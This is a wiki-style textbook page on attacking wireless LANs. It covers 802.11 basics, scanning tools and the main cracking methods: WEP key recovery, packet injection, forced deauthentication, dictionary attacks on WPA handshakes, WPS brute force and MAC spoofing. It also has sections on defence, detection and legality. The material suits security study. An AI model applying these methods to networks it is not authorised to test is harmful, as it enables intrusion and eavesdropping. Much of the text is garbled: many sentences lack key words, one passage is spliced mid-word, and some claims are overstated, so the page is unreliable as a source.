Hacking/Attack/Wireless networks

Cracking a wireless network is defeating the security of a wireless local-area network. A commonly used wireless LAN is a Wi-Fi network. Wireless LANs have inherent security weaknesses from which wired networks are exempt.

Two frequent types of vulnerabilities in wireless LANs are those caused by poor configuration, and those caused by weak or flawed security protocols.

Wi-Fi basics

 * is brand name of family protocols based on  standards.
 * is a group of wireless devices which share a service set identifier.
 * 802.11 networks are either infrastructure networks or . By default, people refer to infrastructure networks.


 * Infrastructure networks are composed of one or more (AP) that coordinate the wireless traffic between the nodes and often connect the nodes to a wired network, acting as a bridge or a router.
 * Each access point constitutes a network that is named a basic service set or BSS. A BSS is identified by a, usually the MAC address of the access point.
 * Each access point is part of an extended service set or ESS, which is identified by an or SSID in short, usually a character string.
 * A basic service set consists of one access point and several wireless clients. An extended service set is a configuration with multiple AP and roaming capabilities for the clients. An independent basic service set or IBSS is the ad hoc configuration. This configuration allows wireless clients to connect to each other directly, without an access point as a central manager.
 * AP broadcast a signal regularly to make the network known to clients. They relay traffic from one wireless client to another. AP may determine which clients may connect, and when clients do, they are said to be with the access point. To obtain access to an access point, both the BSSID and the SSID are required.
 * Ad hoc networks have no access point for central coordination. Each node connects in a peer-to-peer way. This configuration is an or IBSS. Ad hoc networks also have an SSID.

802.11 networks use data frames, management frames, and control frames. Data frames convey the real data, and are similar to those of Ethernet. Management frames maintain both network configuration and connectivity. Control frames manage access to the ether and prevent AP and clients from interfering with each other in the ether. Some information on management frames will be helpful to better understand what programs for reconnaissance do.
 * Beacon frames are used primarily in reconnaissance. They advertise the existence and basic configuration of the network. Each frame contains the BSSID, the SSID, and some information on basic authentication and encryption. Clients use the flow of beacon frames to monitor the signal strength of their access point.
 * Probe request frames are almost the same as the beacon frames. A probe request frame is sent from a client when it wants to connect to a wireless network. It contains information about the requested network.
 * Probe response frames are sent to clients to answer probe request frames. One response frame answers each request frame, and it contains information on the capabilities and configurations of the network. Useful for reconnaissance.
 * Authentication request frames are sent by clients when they want to connect to a network. Authentication precedes association in infrastructure networks. Either open or shared key authentication is possible. After serious flaws were found in shared key authentication, most networks switched to open authentication, combined with a stronger authentication method applied after the association phase.
 * Authentication response frames are sent to clients to answer authentication request frames. There is one answer to each request, and it contains either status information or a challenge related to shared key authentication.
 * Association request frames are sent by clients to associate with the network. An association request frame contains much of the same information as the probe request contains, and it must have the SSID. This can be used to obtain the SSID when a network is configured to hide the SSID in beacon frames.
 * Association response frames are sent to clients to answer an association request frame. They contain a bit of network information and indicate whether the association was successful.
 * Deauthentication and disassociation frames are sent to a node to notify that an authentication or an association has failed and must be established anew.

Reconnaissance of wireless networks
Reconnaissance is performed by s and based on aka rfmon of.

is a common method of wireless network reconnaissance. A well-equipped wardriver uses a laptop computer with a wireless card, an antenna mounted on the car, a power inverter, a connected GPS receiver, and a way to connect to the Internet wirelessly. The purpose of wardriving is to locate a wireless network and to collect information about its configuration and associated clients.

Basic tools

 * linssid - GUI
 * wavemon - TUI
 * iwlist scan
 * iw dev $w scan
 * nmcli dev wifi
 * airodump-ng $w

Bettercap
Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi and other networks.


 * https://www.bettercap.org/modules/wifi/
 * https://www.bettercap.org/modules/ble/
 * https://www.bettercap.org/modules/hid/

inSSIDer
uses the current wireless card or a wireless USB adapter and supports most GPS devices (namely those that use or higher). Its graphical user interface shows MAC address, SSID, signal strength, hardware brand, security, and network type of nearby Wi-Fi networks. It can also track the strength of the signals and show them in a time graph.

Kismet
is a multi-platform wireless network traffic analyzer.

Wireshark
is a packet sniffer and network traffic analyser that can run on all popular operating systems, but support for the capture of wireless traffic is limited. It is free and open source. Decoding and analysing wireless traffic is not the foremost function of Wireshark, but it can give results that cannot be obtained with programs. Wireshark requires sufficient knowledge of the network protocols to obtain a full analysis of the traffic, however.

Analysers of AirMagnet
AirMagnet Laptop Analyser and AirMagnet Handheld Analyser are wireless network analysis tools made by. The company started with the Handheld Analyser, which was very suitable for surveying sites where wireless networks were deployed as well as for finding rogue access points. The Laptop Analyser was released because the hand-held product was impractical for the reconnaissance of wide areas. These commercial analysers probably offer the best combination of powerful analysis and simple user interface. However, they are not as well adapted to the needs of a wardriver as some of the free programs.

Androdumpper
Androdumpper is an Android APK that is used to test and hack WPS Wireless routers which have a vulnerability by using algorithms to hack into that WIFI network. It runs best on Android version 5.0 to 8.0

Airopeek
is a packet sniffer and network traffic analyser made by Wildpackets. This commercial program supports Windows and works with most wireless network interface cards. It has become the industrial standard for capturing and analysing wireless traffic. However, like Wireshark, Airopeek requires thorough knowledge of the protocols to use it to its ability.

KisMac
is a program for the discovery of wireless networks that runs on the OS X operating system. The functionality of KisMac includes GPS support with mapping, SSID decloaking, deauthentication attacks, and cracking.

Penetration to wireless networks
There are two basic types of vulnerabilities associated with WLANs: those caused by poor configuration and those caused by poor encryption. Poor configuration causes many vulnerabilities. Wireless networks are often put into use with no or insufficient security settings. With no security settings – the default configuration – access is obtained simply by association. Without sufficient security settings, and  can easily be defeated. Poor encryption causes the remaining vulnerabilities. Wired Equivalent Privacy (WEP) is defective and can be defeated in several ways. (WPA) and Cisco's (LEAP) are vulnerable to s. Some attacks starts from.

Recent attacks:
 * &mdash; security vulnerability. Data in transmit buffers is sent with, zeroed by disassociation. Discovered in 2019.
 * &mdash; Key Reinstallation Attacks. Breaks by forcing  reuse. Discovered in 2016.

Wired Equivalent Privacy (WEP)
[1997 — 2004] was the encryption standard firstly available for wireless networks. It can be deployed in 64 and 128 bit strength. 64 bit WEP has a secret key of 40 bits and an of 24 bits, and is often called 40 bit WEP. 128 bit WEP has a secret key of 104 bits and an initialisation vector of 24 bits, and is called 104 bit WEP. Association is possible using a, an key, or a hexadr cracking WEP: the  and the chopping attack. The FMS attack – named after Fluhrer, Mantin, and Shamir – is based on a weakness of the  encryption algorithm. The researchers found that 9000 of the possible 16 million initialisation vectors can be considered weak, and collecting enough of them allows the determination of the encryption key. To crack the WEP key in most cases, 5 million encrypted packets must be captured to collect about 3000 weak initialisation vectors. (In some cases 1500 vectors will do, in some other cases more than 5000 are needed for success.) The weak initialisation vectors are supplied to the (KSA) and the  (PRNG) to determine the first byte of the WEP key. This procedure is then repeated for the remaining bytes of the key. The chopping attack chops the last byte off from the captured encrypted packets. This breaks the / (CRC/ICV). When all 8 bits of the removed byte were zero, the CRC of the shortened packet is made valid again by manipulation of the last four bytes. This manipulation is: result = original XOR certain value. The manipulated packet can then be retransmitted. This method enables the determination of the key by collecting unique initialisation vectors. The main problem with both the FMS attack and the chopping attack is that capturing enough packets can take weeks or sometimes months. Fortunately, the speed of capturing packets can be increased by injecting packets into the network. One or more (ARP) packets are usually collected to this end, and then transmitted to the access point repeatedly until enough response packets have been captured. ARP packets are a good choice because they have a recognizable size of 28 bytes. Waiting for a legitimate ARP packet can take awhile. ARP packets are most commonly transmitted during an authentication process. Rather than waiting for that, sending a deauthentication frame that pushes a client off the network will require that client to reauthenticate. This often creates an ARP packet.

Wi-Fi Protected Access (WPA/WPA2)
was developed because of the vulnerabilities of WEP. WPA uses either a (WPA-PSK) or is used in combination with a  server (WPA-RADIUS). For its encryption algorithm, WPA uses either the (TKIP) or the  (AES). was developed because of some vulnerabilities of WPA-PSK and to strengthen the encryption further. WPA2 uses both TKIP and AES, and requires not only an encryption piece but also an authentication piece. A form of the (EAP) is deployed for this piece. WPA-PSK can be attacked when the PSK is shorter than 21 characters. Firstly, the four-way EAP Over LAN (EAPOL) must be captured. This can be captured during a legitimate authentication, or a reauthentication can be forced by sending deauthentication packets to clients. Secondly, each word of a word-list must be with the Hashed Message Authentication Code – Secure Hash Algorithm 1 and two so called nonce values, along with the MAC address of the client that asked for authentication and the MAC address of the access point that gave authentication. Word-lists can be found at. LEAP uses a variation of Microsoft Challenge Handshake Protocol version 2 (MS-CHAPv2). This handshake uses the Data Encryption Standard (DES) for key selection. LEAP can be cracked with a dictionary attack. The attack involves capturing an authentication sequence and then comparing the last two bytes of a captured response with those generated with a word-list. WPA-RADIUS cannot be cracked. However, if the RADIUS authentication server itself can be cracked, then the whole network is imperilled. The security of authentication servers is often neglected. WPA2 can be attacked by using the WPA-PSK attack, but is largely ineffective.

See also

Aircrack-ng
runs on Windows and Linux, and can crack WEP and WPA-PSK. It can use the Pychkine-Tews-Weinmann and KoreK attacks, both are statistical methods that are more efficient than the traditional FMS attack. Aircrack-ng consists of components. Airmon-ng configures the wireless network card. Airodump-ng captures the frames. Aireplay-ng generates traffic. Aircrack-ng does the cracking, using the data collected by airodump-ng. Finally, airdecap-ng decrypts all packets that were captured. Thus, aircrack-ng is the name of the suite and also of one of the components.

CoWPAtty
CoWPAtty automates the dictionary attack for WPA-PSK. It runs on Linux. The program is started using a, specifying a word-list that contains the passphrase, a dump file that contains the four-way EAPOL handshake, and the SSID of the network.

Void11
Void11 is a program that deauthenticates clients. It runs on Linux.

MAC address filtering and its attack
can be used alone as an ineffective security measure, or in combination with encryption. The attack is determining an allowed MAC address, and then changing the MAC address of the attacker to that address.

See also Changing Your MAC Address

Conclusion
ing of a wireless network is often a stepping stone for penetration testing of the internal network. The wireless network then serves as a so-called entry vector. If WPA-RADIUS is in use at a target site, another entry vector must be investigated.

Prevention and Protection
An unprotected wireless network is extremely insecure. From anywhere within broadcast range, someone can eavesdrop or start using the network. Therefore, the IEEE 802.11 standard for wireless networks was accompanied with Wired Equivalent Privacy (WEP). This security protocol takes care of the following: WEP has been criticized by security experts. Most experts regard it as ineffective by now.
 * authentication: assurance that all participants are who they state they are, and are authorized to use the network
 * confidentiality: protection against eavesdropping
 * integrity: assurance of data being unaltered

In 2004 a draft for a better security protocol appeared, and it was included in the IEEE 802.11 standard in 2007. This new protocol,, uses an AES block cipher instead of the RC4 algorithm and has better procedures for authentication and key distribution. WPA2 is much more secure than WEP, but WEP was still in wide use in 2009.

Many wireless routers also support controlling the MAC addresses of computers that are authorized to use a wireless network. This measure can effectively stop a neighbour from using the network, but experienced intruders will not be stopped. MAC filtering can be attacked because a MAC address can be faked easily.

In the past, turning off the broadcasting of the SSID has also been thought to give security to a wireless network. This is not the case however. Freely available tools exist that quickly discover an SSID that is not broadcast. has also determined that switching off the broadcasting of the SSID leads to less security. Details can be found in Non-broadcast Wireless Networks with Microsoft Windows.

Returning to encryption, the WEP specification at any encryption strength is unable to withstand determined hacking. Therefore, Wi-Fi Protected Access (WPA) was derived from WEP. Software upgrades are often available. The latest devices that conform to the or  standards also support WPA2. (WPA uses the TKIP encryption, WPA2 uses the stronger AES method.) It is recommended to use only hardware that supports WPA or WPA2.

Installing updates regularly, disabling WPS, setting a custom SSID, requiring WPA2, and using a strong password make a wireless router more difficult to crack. Even so, unpatched security flaws in a router's software or firmware may still be used by an attacker to bypass encryption and gain control of the device. Many router manufacturers do not always provide security updates in a timely manner, or at all, especially for more inexpensive models.

WPS currently has a severe vulnerability in which the 8 pin numbered (0-9) passwords being used can easily be split into two sections, this means that each section can be brute-forced individually and so the possible combinations are greatly lessened (10^4 + 10^3, as opposed to 10^7). (WPS utilizes 7 digits + EAN8 checksum ;) This vulnerability has been addressed by most manufacturers these days by using a lock down mechanism where the router will automatically lock its WPS after a number of failed pin attempts (it can take a number of hours before the router will automatically unlock, some even have to be rebooted which can make WPS attacks completely obsolete). Without a lock down feature, a WPA2 router with WPS enabled can easily be cracked in 5 hours using a brute force WPS attack.

SSID's are used in routers not only to identify them within the mass of 2.4, 3.6, 5 and 60 GHz frequencies which are currently flying around our cities, but are also used as a "seed" for the router's password hashes. Standard and popular SSID's such as "Netgear" can be brute forced through the use of s, however the use of a salt greatly improves security against rainbow tables. The most popular method of WPA and WPA2 cracking is through obtaining what's known as a "4 way handshake". when a device is connecting with a network there is a 4-stage authorization process referred to as a 4 way handshake. When a wireless device undergoes this process this handshake is sent through the air and can easily be monitored and saved by an external system. The handshake will be encrypted by the router's password, this means that as opposed to communicating with the router directly (which can be quite slow), the cracker can attempt to brute force the handshake itself using dictionary attacks. A device that is connected directly with the router will still undergo this very process, however, the handshake will be sent through the connected wire as opposed to the air so it cannot be intercepted. If a 4 way handshake has already been intercepted, it does not mean that the cracker will be granted immediate access however. If the password used contains at least 12 characters consisting of both random upper and lower case letters and numbers that do not spell a word, name or have any pattern then the password will be essentially uncrackable. Just to give an example of this, let's just take the minimum of 8 characters for WPA2 and suppose we take upper case and lower case letters, digits from 0-9 and a small selection of symbols, we can avail of a hefty choice of 64 characters. In an 8 character length password this is a grand total of 64^8 possible combinations. Taking a single machine that could attempt 500 passwords per second, this gives us just about 17,900 years to attempt every possible combination. Not even to mention the amount of space necessary to store each combination in a dictionary.

Note: The use of MAC filtering to protect your network will not work as MACs using the network can be easily detected and spoofed.

Detection
A network scanner or sniffer is an application program that makes use of a wireless network interface card. It repeatedly tunes the wireless card successively to a number of radio channels. With a this pertains only to the receiver of the wireless card, and therefore the scanning cannot be detected.

An attacker can obtain a considerable amount of information with a passive scanner, but more information may be obtained by sending crafted frames that provoke useful responses. This is called active scanning or probing. Active scanning also involves the use of the transmitter of the wireless card. The activity can therefore be detected and the wireless card can be located.

Detection is possible with an intrusion detection system for wireless networks, and locating is possible with suitable equipment.

Wireless intrusion detection systems are designed to detect anomalous behaviour. They have one or more sensors that collect SSIDs, radio channels, beacon intervals, encryption, MAC addresses, transmission speeds, and s. Wireless intrusion detection systems maintain a registry of MAC addresses with which unknown clients are detected.

Legality
The Netherlands Making use of someone else's wireless access point or wireless router to connect to the internet – without the owner's consent in any way – is not punishable by criminal law in The Netherlands. This is true even if the device uses some form of access protection. To penetrate someone else's computer without the owner's consent is punishable by criminal law though.

See also
 * (parasitic use of wireless networks to obtain internet access)
 * (parasitic use of wireless networks to obtain internet access)

Crackers and society
There is consensus that computer attackers can be divided in the following groups.
 * Adolescent amateurs. They often have a basic knowledge of computer systems and apply scripts and techniques that are available on the internet.
 * Adult amateurs. Most of them are motivated by the intellectual challenge.
 * Professionals. They know much about computers. They are motivated by the financial reward but they are also fond of their activity.

Naming of crackers
The term hacker was originally used for someone who could modify a computer for his or her own purposes. Hacking is an intrusion combined with direct alteration of the security or data structures of the breached system. The word hacking is often confused with cracking in popular media discourse, and obfuscates the fact that hacking is less about eavesdropping and more related to interference and alteration. However, because of the consistent abuse by the news media, in 2007 the term hacker was commonly used for someone who accesses a network or a computer without authorization of the owner.

In 2011,  stated that the word hacker can mean a computer fanatic, in particular one who by means of a breaks into the computer system of a company, government, or the like. It also denoted that in that sense the word hacker is. Slang words are not appropriate in formal writing or speech.

Computer experts reserve the word hacker for a very clever programmer. They call someone who breaks into computers an intruder, attacker, or cracker.

See also


 * &mdash; rogue Wi-Fi access point
 * http://www.wigle.net/ &mdash;
 * http://www.wigle.net/ &mdash;
 * http://www.wigle.net/ &mdash;
 * http://www.wigle.net/ &mdash;